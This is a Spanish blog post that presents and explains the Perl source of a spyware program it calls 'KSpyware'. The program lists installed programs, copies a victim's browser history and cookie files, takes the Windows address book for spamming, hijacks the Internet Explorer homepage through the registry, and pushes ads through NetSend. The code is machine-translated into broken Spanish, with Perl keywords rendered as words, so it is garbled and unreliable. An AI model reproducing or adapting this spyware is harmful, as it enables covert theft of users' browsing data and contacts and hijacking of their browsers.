sábado, 27 de febrero de 2016

CONOSCAMOS UN POCO LA ESTRUCTURA Y SU CODIGO FUENTE DE UN VIRUS ESPIA.

Código Fuente del software espía Virus

 



Código:

############################################
### KSpyware Multas v0.1 Parr Educativos ###############
############################# ###############

USAR Win32;
utilice archivo :: xcopy qw (xcopy);
utilice Win32 :: TieRegistry (delimitador => "/", ArrayValues ​​=> 1);
utilice Win32 :: NetSend;

############################################
### Con el código de abajo, de Podemos Obtener los instalados #########
Programas ### en El Sistema ######################## #
############################################

programfiles sub {
Abierta (PF, '> C: \\ \\ espía pf.txt')
o muero "no puedo abrir el archivo \ n";

opendir (PROGRAMFILES, 'C: \\ Archivos de programa \\')
o muero "produjó Un Problema.";

imprimir PF join ( '-', readdir (PROGRAMFILES));
closedir PRGRAMFILES;
Cerca de PF;
}


######################### ################
### Con el código de abajo, se pueden URL Obtener las Direcciones #########
### Visitas a la Víctima y las galletas ### #############
##################################### ####

indexsites sub {
mi nombre $,
$ Nombre = Win32 :: LoginName ();

Desde $ = "C: \\ WINNT index.dat \\ Archivos Temporales de Internet \\ \\ Content.IE5";
A $ = "C: \\ \\ espía WinntTifIndex.dat";
Win32 :: CopyFile ($ from, $ a, 0);

Desde $ = "C: \\ \\ \\ WINNT las galletas index.dat";
A $ = "C: \\ \\ espía WinntCookiesIndex.dat";
Win32 :: CopyFile ($ from, $ a, 0);

Desde $ = "C: \\ Documents and Settings \\".  $ Nombre.
"\\ Configuracion Local de index.dat \\ Archivos Temporales de Internet \\ \\ Content.IE5";
A $ = "C: \\ \\ espía LocalTifIndex.dat";
Win32 :: CopyFile ($ from, $ al, 0);

Desde $ = "C: \\ Documents and Settings \\".  $ Nombre.
"\\ \\ Las galletas index.dat";
A $ = "C: \\ \\ espía LocalCookiesIndex.dat";
Win32 :: CopyFile ($ from, $ a, 0);

}

##### ###################################
### Con el código de abajo, de Podemos Obtener Una Lista de # #######
### Mensajes de Correo electrónico Direcciones de Correo no Deseado (por ...) #################
############ ###########################

mails sub {
mi nombre $,
$ Nombre = Win32 :: LoginName ();

Desde $ = "C: \\ Documentos y Configuraciones \\".  $ Nombre.
"\\ Datos de programa \\ Microsoft \\ \\ Libro Dirección".  $ Nombre.  ".WAB";
A $ = "C: \\ \\ espía".  $ Nombre.  ".WAB";
Win32 :: CopyFile ($ from, $ a, 0);

}

############################## #######
Secuestro ### IE Mediante la Modificación de la Página principal ##########
####################### ##############

{MainPage Sub
$ = $ USERKEY -Registro>
{ "CUser / Software / Microsoft / Internet Explorer /"};

$ USERKEY -> { "principal // Página de inicio"} = [ "http://www.nzeka-labs.com", "REG_SZ"];
$ USERKEY -> { "principal // Start Page_bak"} = [ "http://www.nzeka-labs.com" "REG_SZ"];
}

#########################################
## # Con el Código de Abajo, Envío de rojo se utilizació parrafo Correo no Deseado #######
### O enviar anuncios al usuario (Envío de Dębe roja Estar Activado) ####
########### ##############################

sub bar {
$ NetSend-> Enviar (
a => "127.0.0.1",
Mensaje => "con Aquí, Un pequeño Anuncio el fin de ganar dinero o para Correo no Deseado !!!");
}

###################
### Punto de entrada !!!  #######
###################

$ Dir = "C: \\ \\ espía";
mkdir $ dir o morir "Se produjó error Un \ n";

Archivos de programa ();
indexsites ();
Electrónicos ();
Pagina principal de ();
pub ();

salida 0;


.  Ahora les explicare Para Que Sirve Cada módulo de este codigo en Perl

Con Este codigo obtendremos Una Lista de Programas instalados en El Sistema.

Código:

############################################
## # Con el código de abajo, de Podemos Obtener los instalados #########
Programas ### en El Sistema ####################### ##
############################################

programfiles sub {
abiertas (PF, '> C: \\ \\ espía pf.txt')
o muero "no puedo abrir el archivo \ n";

opendir (PROGRAMFILES, 'C: \\ Archivos de programa \\')
o morir "Un Ha ocurrido Problema de la ONU.";

imprimir PF join ( '-', readdir (PROGRAMFILES));
closedir PRGRAMFILES;
Cerca de PF;
}


Con Este codigo obtendremos las Direcciones URL Que la victima De visitado ONU, tendremos tambien las cookies.

Código:

#### #####################################
### Con el código de abajo, se pueden URL Obtener las Direcciones #########
### La Víctima visitado y las galletas ################
################ #########################

indexsites sub {
mi nombre $,
$ Nombre = Win32 :: LoginName ();

Desde $ = "C: \\ WINNT index.dat \\ Archivos Temporales de Internet \\ \\ Content.IE5";
A $ = "C: \\ \\ espía WinntTifIndex.dat";
Win32 :: CopyFile ($ from, $ a, 0);

De $ = "C: \\ \\ \\ WINNT las galletas index.dat";
A $ = "C: \\ \\ espía WinntCookiesIndex.dat";
Win32 :: CopyFile ($ from, $ a, 0);

Desde $ = "C: \\ Documents and Settings \\".  $ Nombre.
"\\ Configuracion Local de index.dat \\ Archivos Temporales de Internet \\ \\ Content.IE5";
A $ = "C: \\ \\ espía LocalTifIndex.dat";
Win32 :: CopyFile ($ from, $ al, 0);

Desde $ = "C: \\ Documents and Settings \\".  $ Nombre.
"\\ \\ Las galletas index.dat";
A $ = "C: \\ \\ espía LocalCookiesIndex.dat";
Win32 :: CopyFile ($ from, $ a, 0);

}


Con Este codigo obtendremos Direcciones de Correo electronico Parr Poder Hacer spam ...

Código:

###################################### ##
### Con el código de abajo, de Podemos Obtener Una Lista de ########
### Correos Electrónicos de Correo no Deseado por Direcciones (...) ############ #####
#######################################

Electrónicos sub {
mi nombre $;
$ Nombre = Win32 :: LoginName ();

Desde $ = "C: \\ Documents and Settings \\".  $ Nombre.
"\\ Datos de programa \\ Microsoft \\ \\ Libro Dirección".  $ Nombre.  ".WAB";
A $ = "C: \\ \\ espía".  $ Nombre.  ".WAB";
Win32 :: CopyFile ($ from, $ a, 0);

}


Con Este codigo sabotearemos El Explorador IE Cambio para la pagina de inicio.

Código:

############## #######################
Secuestro ### IE Mediante la Modificación de la Página principal ##########
####### ##############################

{MainPage Sub
$ = $ USERKEY -Registro>
{ "CUser / Software / Microsoft / Internet Explorer /"};

$ USERKEY -> { "principal // Página de inicio"} = [ "http://www.nzeka-labs.com", "REG_SZ"];
$ USERKEY -> { "principal // Start Page_bak"} = [ "http://www.nzeka-labs.com", "REG_SZ"];
}


Como utilizar el parrafo Este codigo NECESITAMOS Que El Rojo ACTIVADO Envía este, Podemos enviar ASI anuncioes ETX Como Es Correo no Deseado.

Código:

#### #####################################
### Con el código de abajo, Envío de rojo se utilizació parrafo ####### Correo no Deseado
### O enviar anuncios al usuario (Envío de Dębe roja Estar Activado) ####
###################### ###################

sub bar {
$ NetSend-> Enviar (
a => "127.0.0.1",
Mensaje => "con Aquí, Un pequeño Anuncio el fin de ganar dinero o al correo no Deseado !!!");
}


Con Este y el punto de entrada ...

Código:

###################
### Punto de entrada !!!  #######
###################

$ Dir = "C: \\ \\ espía";
mkdir $ dir o morir "Se produjó error Un \ n";

Archivos de programa ();
indexsites ();
Electrónicos ();
Pagina principal de ();
pub ();

salida 0;

.perl




















































































































No hay comentarios.:

Publicar un comentario